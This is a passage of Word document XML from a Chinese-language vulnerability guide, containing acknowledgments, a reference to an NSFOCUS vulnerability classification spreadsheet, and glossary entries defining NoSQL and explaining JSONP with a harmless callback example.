    </w:p>
    <w:p w14:paraId="42B28335" w14:textId="77777777" w:rsidR="00153F11" w:rsidRPr="00B21FFF" w:rsidRDefault="00153F11" w:rsidP="00046217">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="111" w:name="_Toc252450382"/>
      <w:bookmarkStart w:id="112" w:name="_Toc269999641"/>
      <w:bookmarkStart w:id="113" w:name="_Toc313620154"/>
      <w:bookmarkStart w:id="114" w:name="_Toc485234168"/>
      <w:bookmarkStart w:id="115" w:name="_Toc498434573"/>
      <w:r w:rsidRPr="00B21FFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>致谢</w:t>
      </w:r>
      <w:bookmarkEnd w:id="111"/>
      <w:bookmarkEnd w:id="112"/>
      <w:bookmarkEnd w:id="113"/>
      <w:bookmarkEnd w:id="114"/>
      <w:bookmarkEnd w:id="115"/>
    </w:p>
    <w:p w14:paraId="5560707A" w14:textId="1654DE9B" w:rsidR="00153F11" w:rsidRPr="00A17C26" w:rsidRDefault="00640800" w:rsidP="00A17C26">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编写</w:t>
      </w:r>
      <w:r w:rsidR="00153F11" w:rsidRPr="00A17C26">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简"/>
        </w:rPr>
        <w:t>过程中，</w:t>
      </w:r>
      <w:r w:rsidR="00153F11" w:rsidRPr="00A17C26">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>感谢</w:t>
      </w:r>
      <w:r w:rsidR="005A1B6E" w:rsidRPr="00A17C26">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>业务标准化小组</w:t>
      </w:r>
      <w:r w:rsidR="00A17C26">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>成员</w:t>
      </w:r>
      <w:r w:rsidR="00153F11" w:rsidRPr="00A17C26">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简"/>
        </w:rPr>
        <w:t>的大力配合</w:t>
      </w:r>
      <w:r w:rsidR="00A17C26">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和提出的宝贵建议</w:t>
      </w:r>
      <w:r w:rsidR="00153F11" w:rsidRPr="00A17C26">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC7EB8F" w14:textId="77777777" w:rsidR="00153F11" w:rsidRPr="00A17C26" w:rsidRDefault="00153F11" w:rsidP="00A17C26">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简"/>
        </w:rPr>
        <w:sectPr w:rsidR="00153F11" w:rsidRPr="00A17C26" w:rsidSect="00A112C6">
          <w:footnotePr>
            <w:numFmt w:val="decimalEnclosedCircleChinese"/>
            <w:numRestart w:val="eachPage"/>
          </w:footnotePr>
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="2098" w:right="1701" w:bottom="1191" w:left="1701" w:header="1418" w:footer="851" w:gutter="0"/>
          <w:cols w:space="425"/>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="541C61D7" w14:textId="618A9E3B" w:rsidR="0009575B" w:rsidRPr="00112A2E" w:rsidRDefault="00A846A6" w:rsidP="0009575B">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:bookmarkStart w:id="116" w:name="_Toc498434574"/>
      <w:r w:rsidRPr="00112A2E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>漏洞分类依据</w:t>
      </w:r>
      <w:bookmarkEnd w:id="116"/>
    </w:p>
    <w:p w14:paraId="213197BB" w14:textId="1CF286BF" w:rsidR="0009575B" w:rsidRDefault="00F824DE" w:rsidP="00F824DE">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F824DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考《绿盟科技漏洞分类树形和场景</w:t>
      </w:r>
      <w:r w:rsidRPr="00F824DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.xlsx</w:t>
      </w:r>
      <w:r w:rsidRPr="00F824DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>》</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D1F152" w14:textId="207DD393" w:rsidR="00013DB8" w:rsidRPr="00F824DE" w:rsidRDefault="00634ADD" w:rsidP="00D44EBE">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLineChars="95" w:firstLine="199"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:object w:dxaOrig="1520" w:dyaOrig="960" w14:anchorId="4887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51" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Excel.Sheet.8" ShapeID="_x0000_i1025" DrawAspect="Icon" ObjectID="_1616220719" r:id="rId52"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AF85F3" w14:textId="58DF62AF" w:rsidR="00153F11" w:rsidRPr="00E96F7B" w:rsidRDefault="005E6264" w:rsidP="00106665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:bookmarkStart w:id="117" w:name="_Toc498434575"/>
      <w:r w:rsidRPr="00112A2E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>名词</w:t>
      </w:r>
      <w:r w:rsidR="00B55608" w:rsidRPr="00112A2E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解释</w:t>
      </w:r>
      <w:bookmarkEnd w:id="117"/>
    </w:p>
    <w:p w14:paraId="13B328FB" w14:textId="7C77F165" w:rsidR="00B31E3F" w:rsidRPr="00132143" w:rsidRDefault="001359E2" w:rsidP="00132143">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NoSQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2074BD4F" w14:textId="3CB3244B" w:rsidR="001359E2" w:rsidRPr="00132143" w:rsidRDefault="00FB6D52" w:rsidP="00132143">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NoSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>泛指依赖于不同存储机制的非关系型数据库，这些存储机制包括文档存储、键值对存储和图。包括像</w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MongoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cassandra</w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之类的</w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NoSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库，也有像</w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Redis</w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Memcached</w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样的内存和缓存存储。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC63509" w14:textId="639ACF46" w:rsidR="009032B1" w:rsidRPr="00132143" w:rsidRDefault="005663BF" w:rsidP="00132143">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JS</w:t>
      </w:r>
      <w:r w:rsidR="007A51BD" w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ONP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C36FB0B" w14:textId="766BAA84"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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JSONP</w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>全称是</w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JSON with Padding</w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，是基于</w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JSON</w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>格式的为解决跨域请求资源而产生的解决方案。他实现的基本原理是利用了</w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTML </w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>里</w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;script&gt;&lt;/script&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>元素标签，远程调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> JSON </w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>文件来实现数据传递。如要在</w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> a.com </w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>域下获取存在</w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> b.com </w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> JSON </w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>数据</w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>( getUsers.JSON ):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639F04E3" w14:textId="1F4BC293" w:rsidR="005663BF" w:rsidRPr="00132143" w:rsidRDefault="005663BF" w:rsidP="00132143">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="Menlo"/>
          <w:bCs/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="E1E1E8" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F9"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:bCs/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>{"id" : "1","name" : "</w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:bCs/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:bCs/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E468110"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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>那么他们可以首先通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> JSONP </w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的“</w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Padding </w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”这个</w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> getUsers.JSON </w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>输出为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE9F7D5" w14:textId="0A33B776" w:rsidR="005663BF" w:rsidRPr="00132143" w:rsidRDefault="005663BF" w:rsidP="00132143">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:cs="Menlo"/>
          <w:bCs/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="E1E1E8" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F9"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:bCs/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>callback({"id" : "1","name" : "</w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:bCs/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:bCs/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>"}); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415F3697"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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对于实际应用过程中</w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> callback </w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的名称在后台实现是动态输出的。如上面例子在</w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r w:rsidRPr="00132143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>实现：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8290"/>
      </w:tblGrid>
      <w:tr w:rsidR="005663BF" w:rsidRPr="00132143" w14:paraId="39512AFC" w14:textId="77777777" w:rsidTr="005663BF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8290" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08A411F8"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php</w:t>
            </w:r>
          </w:p>
